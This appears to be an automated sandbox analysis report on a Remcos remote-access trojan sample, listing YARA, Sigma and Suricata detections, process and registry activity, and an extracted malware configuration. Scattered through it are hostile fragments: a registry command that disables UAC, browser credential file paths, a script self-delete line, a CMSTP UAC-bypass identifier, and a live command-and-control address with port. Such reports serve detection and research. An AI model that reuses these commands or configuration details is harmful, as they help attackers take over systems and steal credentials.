0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.3.yavascript.exe.2560000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
23.2.yavascript.exe.ae0e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
23.2.yavascript.exe.ae0e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.3.yavascript.exe.2560000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
Click to see the 139 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2iH7rqx9rQ.exe, ProcessId: 2268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-I7G983

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 1E 04 D2 DB 3F 0C FE F3 82 62 77 23 55 F6 79 B1 49 36 BF E5 93 32 C5 27 A7 CB 74 6A 9E 1A 20 B0 86 53 91 49 5B 14 F9 00 36 A6 E7 34 E5 ED 09 E0 2C 9D 04 D1 1B 0E FE 90 9F 15 4B 75 A8 34 30 C5 78 C4 60 5A 9F 89 22 B2 E7 68 86 0C F6 47 B3 30 D7 73 51 70 26 DF 63 DA 78 E1 5D 5F 72 46 AC 13 9C 71 40 89 77 9B 1B 50 E1 E0 68 12 1E 62 88 F6 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, ProcessId: 7796, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-I7G983\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:36:30.592480+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49767	198.23.227.212	32583	TCP
2025-01-11T07:36:35.140804+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49798	198.23.227.212	32583	TCP
2025-01-11T07:36:38.652284+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49819	198.23.227.212	32583	TCP
2025-01-11T07:36:41.248770+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49831	198.23.227.212	32583	TCP
2025-01-11T07:36:44.549896+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49850	198.23.227.212	32583	TCP
2025-01-11T07:36:47.855902+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49870	198.23.227.212	32583	TCP
2025-01-11T07:36:50.497001+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49888	198.23.227.212	32583	TCP
2025-01-11T07:36:53.113461+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49905	198.23.227.212	32583	TCP
2025-01-11T07:36:55.813641+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49919	198.23.227.212	32583	TCP
2025-01-11T07:36:58.967562+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49942	198.23.227.212	32583	TCP
2025-01-11T07:37:01.622210+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49964	198.23.227.212	32583	TCP
2025-01-11T07:37:04.218365+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49983	198.23.227.212	32583	TCP
2025-01-11T07:37:06.983226+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49999	198.23.227.212	32583	TCP
2025-01-11T07:37:09.576239+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50012	198.23.227.212	32583	TCP
2025-01-11T07:37:12.217623+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50013	198.23.227.212	32583	TCP
2025-01-11T07:37:14.828072+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50014	198.23.227.212	32583	TCP
2025-01-11T07:37:17.595257+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50016	198.23.227.212	32583	TCP
2025-01-11T07:37:20.763017+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50019	198.23.227.212	32583	TCP
2025-01-11T07:37:23.390388+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50020	198.23.227.212	32583	TCP
2025-01-11T07:37:25.984447+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50021	198.23.227.212	32583	TCP
2025-01-11T07:37:28.608719+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50022	198.23.227.212	32583	TCP
2025-01-11T07:37:31.687216+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50023	198.23.227.212	32583	TCP
2025-01-11T07:37:34.278542+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50024	198.23.227.212	32583	TCP
2025-01-11T07:37:36.911650+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50025	198.23.227.212	32583	TCP
2025-01-11T07:37:39.517166+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50026	198.23.227.212	32583	TCP
2025-01-11T07:37:42.140664+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50027	198.23.227.212	32583	TCP
2025-01-11T07:37:44.731747+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50028	198.23.227.212	32583	TCP
2025-01-11T07:37:47.342438+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50029	198.23.227.212	32583	TCP
2025-01-11T07:37:49.957005+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50030	198.23.227.212	32583	TCP
2025-01-11T07:37:52.560891+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50031	198.23.227.212	32583	TCP
2025-01-11T07:37:55.173241+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50032	198.23.227.212	32583	TCP
2025-01-11T07:37:57.984143+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50033	198.23.227.212	32583	TCP
2025-01-11T07:38:01.192449+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50034	198.23.227.212	32583	TCP
2025-01-11T07:38:03.780309+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50035	198.23.227.212	32583	TCP
2025-01-11T07:38:06.318099+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50036	198.23.227.212	32583	TCP
2025-01-11T07:38:08.794036+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50037	198.23.227.212	32583	TCP
2025-01-11T07:38:11.263285+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50038	198.23.227.212	32583	TCP
2025-01-11T07:38:13.724260+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50039	198.23.227.212	32583	TCP
2025-01-11T07:38:16.201140+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	50040	198.23.227.212	32583	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I7G983", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Virustotal: Detection: 56%			Perma Link

Multi AV Scanner detection for submitted file

Source: 2iH7rqx9rQ.exe	Virustotal: Detection: 56%			Perma Link
Source: 2iH7rqx9rQ.exe	ReversingLabs: Detection: 76%

Yara detected Remcos RAT

Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779058445.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754239939.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 2iH7rqx9rQ.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	0_2_0043293A
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A2BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	0_2_024A2BA1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	23_2_0043293A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B12BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	23_2_00B12BA1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	24_2_0043293A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02542BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	24_2_02542BA1
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	35_2_0043293A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02512BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	35_2_02512BA1

Source: 2iH7rqx9rQ.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00406764 _wcslen,CoGetObject,	0_2_00406764
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00406764 _wcslen,CoGetObject,	23_2_00406764
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00406764 _wcslen,CoGetObject,	24_2_00406764
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00406764 _wcslen,CoGetObject,	35_2_00406764

Source: 2iH7rqx9rQ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0040B335
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	0_2_0041B42F
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_0040B53A
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0044D5E9 FindFirstFileExA,	0_2_0044D5E9
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	0_2_004089A9
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,	0_2_00406AC2
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	0_2_00407A8C
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00418C69
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	0_2_00408DA7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_0247900E
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	0_2_0248B696
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0247B59C
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024BD850 FindFirstFileExA,	0_2_024BD850
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02488ED0 FindFirstFileW,	0_2_02488ED0
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02477CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	0_2_02477CF3
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02476D29 FindFirstFileW,FindNextFileW,	0_2_02476D29
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	23_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	23_2_0041B42F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	23_2_0040B53A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0044D5E9 FindFirstFileExA,	23_2_0044D5E9
